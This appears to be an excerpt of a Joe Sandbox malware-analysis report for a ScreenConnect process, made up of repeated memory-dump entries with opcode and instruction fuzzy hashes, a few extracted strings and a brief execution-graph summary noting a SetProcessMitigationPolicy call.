                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3c0bd53a1f735b1814b08d8c76a736dd2d7bd070e5ba361b319b36004f1ddbb6
                                                                                                                                                                                                                                                          • Instruction ID: 561b20c10766b5ee718889bc4d619c989d13f651cb387c85ead0a3560117401f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c0bd53a1f735b1814b08d8c76a736dd2d7bd070e5ba361b319b36004f1ddbb6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F02B639082944FE713C768B8517993FE1BF83260B4D45CFD041CF553D758A509D792
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c69e6a2b9eac6a6acc3e3a7610399fd966e4f665ebd99904d77e11c0e3c0eca5
                                                                                                                                                                                                                                                          • Instruction ID: d126090fb3ed3eee8211541cfa028016f44c58a5ba88ba533a2e8238a7d81f16
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c69e6a2b9eac6a6acc3e3a7610399fd966e4f665ebd99904d77e11c0e3c0eca5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F05E30700218CFE715DF69C455BAEBBE2EF886507058069E909CB364DB35DE11CB81
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 220faa2acd0a23a98fa43dc1306efbe494f48c528ef52f8aa8df2f12815a9974
                                                                                                                                                                                                                                                          • Instruction ID: f8ed6b118d1f466b2993b7d8a60eb1ee60615c346f695c07bf48cab167fa3e26
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 220faa2acd0a23a98fa43dc1306efbe494f48c528ef52f8aa8df2f12815a9974
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E065767042096F4705CE8ED401D6BBFEEEFD9620714C02AF80DCB305DA39D91187A0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 61680e9371dcbd29c4642410451356fbe596e251bab95b45807a38e9d9f8e919
                                                                                                                                                                                                                                                          • Instruction ID: c77dfad870786c6f00b9df847059820210473563e1e064b314b858c227760ce9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61680e9371dcbd29c4642410451356fbe596e251bab95b45807a38e9d9f8e919
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E0E5723052019FC7023AE8A85429E7B56FED65313044067D099CA386EF649C46D252
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5ac6c5358591689a7e11878cdb045469ae6e4bf1c59b57c095de8919aa494c46
                                                                                                                                                                                                                                                          • Instruction ID: cf30c960c8c2e5cafb3591e03188e7f2a0a8c2272eac1dc12a009a56b5953bce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac6c5358591689a7e11878cdb045469ae6e4bf1c59b57c095de8919aa494c46
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E02673E0A0145FCB204EADEC549EB3FE8EEC56B431901ABD40ECB301E9245C01CB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3d38167eedbfef9ec8c8a1b6c5380d7c6b6a7d16ee4d4f0f504f22011394eacb
                                                                                                                                                                                                                                                          • Instruction ID: 0c3174e890a5c9014f20f23183a3cdb2c12166e0fcc8af93d6b7da3658f18a53
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d38167eedbfef9ec8c8a1b6c5380d7c6b6a7d16ee4d4f0f504f22011394eacb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE06D343007008FC314DB19D144E56B7E6EF89B20F1984ADE5098B7A1CBB1EC41CB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b7cc3729c73978734137c2596a4daa5881260a1a0ec1c572494dc849be37d880
                                                                                                                                                                                                                                                          • Instruction ID: 941606e7eae3bd293ce1c3c09ac97567a3d1569eb6cc1e149ef9a720cbc68ba8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7cc3729c73978734137c2596a4daa5881260a1a0ec1c572494dc849be37d880
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F01576D002249FDB91DFA8D9419EDFBB0AF4A204B1481AAC959D7202E2318A028FD1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 92db26e6683413525e481c6feb5076e635b09c24a8b82f1d8e06c1a35209c26d
                                                                                                                                                                                                                                                          • Instruction ID: d655117040c37d33fe82dbe2281eee01cc37f39db0918148da8b654d00273d63
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92db26e6683413525e481c6feb5076e635b09c24a8b82f1d8e06c1a35209c26d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE04F31814748CFCB01EF78C8994A9BBB5EF95200B05C68FD4495B162EB309594E741
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7b09ccc5339dd8c63cd6b00744755ae9c48838fac4f6fa74159b5453d3d64dbd
                                                                                                                                                                                                                                                          • Instruction ID: 03e262e4c85625f690f6b53b3db87dc8234a52b4d24f2ca77d61f817de118077
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b09ccc5339dd8c63cd6b00744755ae9c48838fac4f6fa74159b5453d3d64dbd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1ED09E34750208CFA728DEEDD9C4A2573E57B84D253A184A9D6068F232EA31FC42CA65
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ec0ae92ca6ed55cded67962c341d7a33618387189b1b367a850525e63a903362
                                                                                                                                                                                                                                                          • Instruction ID: 002d18642df6f96ac98b0c0f4e65adb4b11d8c8d93743c85c3fe972b72b9d24a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec0ae92ca6ed55cded67962c341d7a33618387189b1b367a850525e63a903362
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D0127190520CEFCB40DFA4E901A5DB7B5EB46214B208599D808D3200DA315F14AB41
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 168fffbcdc1285cbac8597e9231584d7b5ca693e705fbc521ad453c9311de100
                                                                                                                                                                                                                                                          • Instruction ID: 9d875156fdba71628640927eb4a7fc3c09012615ef96272c4778aaa862e08ab8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 168fffbcdc1285cbac8597e9231584d7b5ca693e705fbc521ad453c9311de100
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDE06774218680CFC716CB58C594910FFE1BF8B21431EC6D9D8888F7A6CA31EC46DB82
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 93789af90c16ad42d31f481063d05055d6bbc36b73380d548be87e4116d59851
                                                                                                                                                                                                                                                          • Instruction ID: d12049cc81969ec9aa20662d8253836de8b02289385caa3f1a4aa95feb4351de
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93789af90c16ad42d31f481063d05055d6bbc36b73380d548be87e4116d59851
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D01270D0110DFF8B00EFA8ED0555DB7B5EF84214B108599E509D3200DA315F10AB51
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb1ba176e059999c911a28a04a60a1e54c3ed899e16302e8072d2f41dbbd926a
                                                                                                                                                                                                                                                          • Instruction ID: 432650d59a994ba4a620ea38ba632a261ab5b4f4549ff55b5cc31f90bb7334d9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1ba176e059999c911a28a04a60a1e54c3ed899e16302e8072d2f41dbbd926a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D0127194020CEB8B00DFA8EA0155D7BF5EB44214B104599D408D3300DA315F019B51
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 92119d29293856c4ce3d9431d2db8800aead95082e8d063a3f911b85c06181d5
                                                                                                                                                                                                                                                          • Instruction ID: 7c662ffc25252c067357c02792f45913e39fb7f107546d6ca2488ff0f8c4825c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92119d29293856c4ce3d9431d2db8800aead95082e8d063a3f911b85c06181d5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91D0673140A3448FCB02DF64DC56B257FB6FF06201F8515A7E011CB171D7305426EBA2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 592057d8cca5469ee50b58781a4c6e0f37fed4b864aba6575336dd3ed251b676
                                                                                                                                                                                                                                                          • Instruction ID: 6413ca30d8d64c14710f5aaa88f331767a2ab507c715b3165bed88488016cf8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 592057d8cca5469ee50b58781a4c6e0f37fed4b864aba6575336dd3ed251b676
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87C080217470100FD24DD20CDD50E14E7D69BDD251B3CD467B519C77A5C921DD438340
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;$K$[$[
                                                                                                                                                                                                                                                          • API String ID: 0-2650379400
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;$K$[$[
                                                                                                                                                                                                                                                          • API String ID: 0-2650379400

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:11.9%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:5
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 16736 7ff887f58014 16737 7ff887f5801d 16736->16737 16738 7ff887f58082 16737->16738 16739 7ff887f580f6 SetProcessMitigationPolicy 16737->16739 16740 7ff887f58152 16739->16740

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 6$6
                                                                                                                                                                                                                                                          • API String ID: 0-344375709

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Jr$Jr
                                                                                                                                                                                                                                                          • API String ID: 0-944056412
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c960813f5b4d81628e04fd6811b551014637a1c48462b0b6df96ec497d15e35b
                                                                                                                                                                                                                                                          • Instruction ID: b9380848f6d4ab0e37210fd11b96bee636dd0934b7b8f5866c0cb7ad430d14f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c960813f5b4d81628e04fd6811b551014637a1c48462b0b6df96ec497d15e35b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B262C031A1CA5B8BE7A9EA2984553F932D2FF94396F540079D44EC72C6DF2CB806C385
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 14893abc6ebf37c9f03d0332300b3681ade524ddb24c435db70ad48f4cc10523
                                                                                                                                                                                                                                                          • Instruction ID: 4156a565cfa04bef864ea090ac61e8c0611dd8bc9ca335b3688fa2d7c51e04cb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14893abc6ebf37c9f03d0332300b3681ade524ddb24c435db70ad48f4cc10523
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF14721A0CA8A4FE799EA2C98551B577D1FF543A1F4801BAD44EC7293EF29FC06C385
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bb053f1a535663c526ea02f21d2d1023d590fa210d3bd27d0b07425ab70d79fc
                                                                                                                                                                                                                                                          • Instruction ID: 2e8aa20d7f3c36ee09f1ab0cdb854e3cc0fc4bee26b46c31ae662d151b88db15
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb053f1a535663c526ea02f21d2d1023d590fa210d3bd27d0b07425ab70d79fc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F1C131A0CA4B8BE7A9EA2984656F972D2FF94395F540079D44EC72C6DF2CB806C345
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fe467b7354699c8f1b6487fb5695f2fe9a31804cf07d14f1e2b024c018eeb9dd
                                                                                                                                                                                                                                                          • Instruction ID: 47d310bd0ebb83d0398b2b29a4fb65e3d958a8c335990cbb9e9da78b86d00258
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe467b7354699c8f1b6487fb5695f2fe9a31804cf07d14f1e2b024c018eeb9dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8D1A430A08E478BEBA9EA2984656FE63D2FF94391F540479D44EC72C6DF2CB805C785

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Jr$Jr
                                                                                                                                                                                                                                                          • API String ID: 0-944056412
                                                                                                                                                                                                                                                          • Opcode ID: 02ccf97ff42671a6600c977e6592ee18d4bbf21b53f1500e656cf6091adda73d
                                                                                                                                                                                                                                                          • Instruction ID: d1a599c475249624a452faaf766fcd215883a6d438b29751f29ddbe2b34ac8e3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ccf97ff42671a6600c977e6592ee18d4bbf21b53f1500e656cf6091adda73d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0A1DC34A1C54A8BEB5CEA18C8527FD76A2FF95342F500079E04AD32C6DF2C694ACB52

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: {6
                                                                                                                                                                                                                                                          • API String ID: 0-1623870270
                                                                                                                                                                                                                                                          • Opcode ID: d9672dfc0b93e1f6839fd57c9df388a55976baf174fb525aaca8384a4ef1397e
                                                                                                                                                                                                                                                          • Instruction ID: a03cadb18c90f9e0d570410bbbce1a84365585e1ef60aeed04abbc741add7270
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9672dfc0b93e1f6839fd57c9df388a55976baf174fb525aaca8384a4ef1397e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E1E031A0CA864FE359EB289855AE93BE1FF99351F4401BAD44DC72D3DF28B806C749

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1894231024.00007FF887F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff887f50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
